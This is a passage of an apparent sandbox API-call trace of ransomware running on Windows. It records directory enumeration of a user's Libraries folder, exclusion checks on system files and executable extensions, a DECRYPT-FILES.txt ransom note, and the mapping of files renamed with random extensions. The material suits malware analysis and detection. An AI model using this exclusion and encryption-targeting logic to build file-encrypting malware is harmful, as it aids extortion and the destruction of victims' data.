HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\All Users") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="AhnLab") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.145] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0182.145] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.145] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\0a16c9.tmp") returned 85 [0182.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0182.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0182.146] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.146] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\DECRYPT-FILES.txt") returned 92 [0182.146] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0182.146] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0182.146] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef96f3a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef96f3a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0182.146] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.146] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef96f3a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef96f3a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.146] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.146] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.146] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xef96f3a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xef96f3a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef96f3a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.146] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.146] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.146] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.146] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.146] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.147] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.147] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.147] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.147] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.147] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.147] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.147] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.147] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.147] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.147] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.147] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0182.147] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.147] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0182.147] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\0a16c9.tmp" [0182.147] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.147] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.147] CloseHandle (hObject=0x0) returned 0 [0182.147] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.147] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbda0c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabbda0c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.148] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.148] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0182.148] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0182.148] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0182.148] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0182.148] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0182.148] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d1e12e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf33, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.library-ms.7KLNu", cAlternateFileName="DOCUME~1.7KL")) returned 1 [0182.148] lstrcmpiW (lpString1="Documents.library-ms.7KLNu", lpString2="DECRYPT-FILES.txt") returned 1 [0182.148] lstrcmpiW (lpString1="Documents.library-ms.7KLNu", lpString2="autorun.inf") returned 1 [0182.148] lstrcmpiW (lpString1="Documents.library-ms.7KLNu", lpString2="boot.ini") returned 1 [0182.148] lstrcmpiW (lpString1="Documents.library-ms.7KLNu", lpString2="desktop.ini") returned 1 [0182.148] lstrcmpiW (lpString1="Documents.library-ms.7KLNu", lpString2="ntuser.dat") returned -1 [0182.148] lstrcmpiW (lpString1="Documents.library-ms.7KLNu", lpString2="iconcache.db") returned -1 [0182.148] lstrcmpiW (lpString1="Documents.library-ms.7KLNu", lpString2="bootsect.bak") returned 1 [0182.148] lstrcmpiW (lpString1="Documents.library-ms.7KLNu", lpString2="ntuser.dat.log") returned -1 [0182.148] lstrcmpiW (lpString1="Documents.library-ms.7KLNu", lpString2="thumbs.db") returned -1 [0182.148] lstrcmpiW (lpString1="Documents.library-ms.7KLNu", lpString2="Bootfont.bin") returned 1 [0182.148] lstrlenW (lpString="Documents.library-ms.7KLNu") returned 26 [0182.148] lstrcmpiW (lpString1="7KLNu", lpString2="lnk") returned -1 [0182.148] lstrcmpiW (lpString1="7KLNu", lpString2="exe") returned -1 [0182.148] lstrcmpiW (lpString1="7KLNu", lpString2="sys") returned -1 [0182.148] lstrcmpiW (lpString1="7KLNu", lpString2="dll") returned -1 [0182.148] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0182.148] lstrlenW (lpString="Documents.library-ms.7KLNu") returned 26 [0182.148] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0182.148] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Documents.library-ms.7KLNu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.7KLNu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.7KLNu" [0182.148] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.7KLNu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms.7klnu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0182.149] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=3891) returned 1 [0182.149] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0182.150] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.151] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.151] CloseHandle (hObject=0x280) returned 1 [0182.151] CloseHandle (hObject=0x27c) returned 1 [0182.151] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.151] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d22d5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xabc26380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf08, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.library-ms.0qY76lu", cAlternateFileName="MUSICL~1.0QY")) returned 1 [0182.151] lstrcmpiW (lpString1="Music.library-ms.0qY76lu", lpString2="DECRYPT-FILES.txt") returned 1 [0182.151] lstrcmpiW (lpString1="Music.library-ms.0qY76lu", lpString2="autorun.inf") returned 1 [0182.151] lstrcmpiW (lpString1="Music.library-ms.0qY76lu", lpString2="boot.ini") returned 1 [0182.151] lstrcmpiW (lpString1="Music.library-ms.0qY76lu", lpString2="desktop.ini") returned 1 [0182.151] lstrcmpiW (lpString1="Music.library-ms.0qY76lu", lpString2="ntuser.dat") returned -1 [0182.151] lstrcmpiW (lpString1="Music.library-ms.0qY76lu", lpString2="iconcache.db") returned 1 [0182.151] lstrcmpiW (lpString1="Music.library-ms.0qY76lu", lpString2="bootsect.bak") returned 1 [0182.151] lstrcmpiW (lpString1="Music.library-ms.0qY76lu", lpString2="ntuser.dat.log") returned -1 [0182.151] lstrcmpiW (lpString1="Music.library-ms.0qY76lu", lpString2="thumbs.db") returned -1 [0182.151] lstrcmpiW (lpString1="Music.library-ms.0qY76lu", lpString2="Bootfont.bin") returned 1 [0182.151] lstrlenW (lpString="Music.library-ms.0qY76lu") returned 24 [0182.151] lstrcmpiW (lpString1="0qY76lu", lpString2="lnk") returned -1 [0182.151] lstrcmpiW (lpString1="0qY76lu", lpString2="exe") returned -1 [0182.151] lstrcmpiW (lpString1="0qY76lu", lpString2="sys") returned -1 [0182.151] lstrcmpiW (lpString1="0qY76lu", lpString2="dll") returned -1 [0182.151] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0182.151] lstrlenW (lpString="Music.library-ms.0qY76lu") returned 24 [0182.151] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0182.152] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Music.library-ms.0qY76lu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.0qY76lu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.0qY76lu" [0182.152] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.152] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.0qY76lu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms.0qy76lu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0182.152] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=3848) returned 1 [0182.152] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0182.152] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.153] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.153] CloseHandle (hObject=0x280) returned 1 [0182.153] CloseHandle (hObject=0x27c) returned 1 [0182.153] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.154] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d207440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xabc4c4e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures.library-ms.sRdsgRd", cAlternateFileName="PICTUR~1.SRD")) returned 1 [0182.154] lstrcmpiW (lpString1="Pictures.library-ms.sRdsgRd", lpString2="DECRYPT-FILES.txt") returned 1 [0182.154] lstrcmpiW (lpString1="Pictures.library-ms.sRdsgRd", lpString2="autorun.inf") returned 1 [0182.154] lstrcmpiW (lpString1="Pictures.library-ms.sRdsgRd", lpString2="boot.ini") returned 1 [0182.154] lstrcmpiW (lpString1="Pictures.library-ms.sRdsgRd", lpString2="desktop.ini") returned 1 [0182.154] lstrcmpiW (lpString1="Pictures.library-ms.sRdsgRd", lpString2="ntuser.dat") returned 1 [0182.154] lstrcmpiW (lpString1="Pictures.library-ms.sRdsgRd", lpString2="iconcache.db") returned 1 [0182.154] lstrcmpiW (lpString1="Pictures.library-ms.sRdsgRd", lpString2="bootsect.bak") returned 1 [0182.154] lstrcmpiW (lpString1="Pictures.library-ms.sRdsgRd", lpString2="ntuser.dat.log") returned 1 [0182.154] lstrcmpiW (lpString1="Pictures.library-ms.sRdsgRd", lpString2="thumbs.db") returned -1 [0182.154] lstrcmpiW (lpString1="Pictures.library-ms.sRdsgRd", lpString2="Bootfont.bin") returned 1 [0182.154] lstrlenW (lpString="Pictures.library-ms.sRdsgRd") returned 27 [0182.154] lstrcmpiW (lpString1="sRdsgRd", lpString2="lnk") returned 1 [0182.154] lstrcmpiW (lpString1="sRdsgRd", lpString2="exe") returned 1 [0182.155] lstrcmpiW (lpString1="sRdsgRd", lpString2="sys") returned -1 [0182.155] lstrcmpiW (lpString1="sRdsgRd", lpString2="dll") returned 1 [0182.155] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0182.155] lstrlenW (lpString="Pictures.library-ms.sRdsgRd") returned 27 [0182.155] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0182.155] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Pictures.library-ms.sRdsgRd" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.sRdsgRd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.sRdsgRd" [0182.155] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.sRdsgRd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms.srdsgrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0182.155] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=3883) returned 1 [0182.155] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0182.155] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.156] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.157] CloseHandle (hObject=0x280) returned 1 [0182.157] CloseHandle (hObject=0x27c) returned 1 [0182.157] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.157] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d207440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xabc987a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf16, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms.glYz", cAlternateFileName="VIDEOS~1.GLY")) returned 1 [0182.157] lstrcmpiW (lpString1="Videos.library-ms.glYz", lpString2="DECRYPT-FILES.txt") returned 1 [0182.157] lstrcmpiW (lpString1="Videos.library-ms.glYz", lpString2="autorun.inf") returned 1 [0182.157] lstrcmpiW (lpString1="Videos.library-ms.glYz", lpString2="boot.ini") returned 1 [0182.157] lstrcmpiW (lpString1="Videos.library-ms.glYz", lpString2="desktop.ini") returned 1 [0182.157] lstrcmpiW (lpString1="Videos.library-ms.glYz", lpString2="ntuser.dat") returned 1 [0182.157] lstrcmpiW (lpString1="Videos.library-ms.glYz", lpString2="iconcache.db") returned 1 [0182.157] lstrcmpiW (lpString1="Videos.library-ms.glYz", lpString2="bootsect.bak") returned 1 [0182.157] lstrcmpiW (lpString1="Videos.library-ms.glYz", lpString2="ntuser.dat.log") returned 1 [0182.157] lstrcmpiW (lpString1="Videos.library-ms.glYz", lpString2="thumbs.db") returned 1 [0182.157] lstrcmpiW (lpString1="Videos.library-ms.glYz", lpString2="Bootfont.bin") returned 1 [0182.157] lstrlenW (lpString="Videos.library-ms.glYz") returned 22 [0182.157] lstrcmpiW (lpString1="glYz", lpString2="lnk") returned -1 [0182.157] lstrcmpiW (lpString1="glYz", lpString2="exe") returned 1 [0182.157] lstrcmpiW (lpString1="glYz", lpString2="sys") returned -1 [0182.157] lstrcmpiW (lpString1="glYz", lpString2="dll") returned 1 [0182.157] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0182.157] lstrlenW (lpString="Videos.library-ms.glYz") returned 22 [0182.157] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0182.157] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Videos.library-ms.glYz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.glYz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.glYz" [0182.157] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.158] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.glYz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms.glyz"), 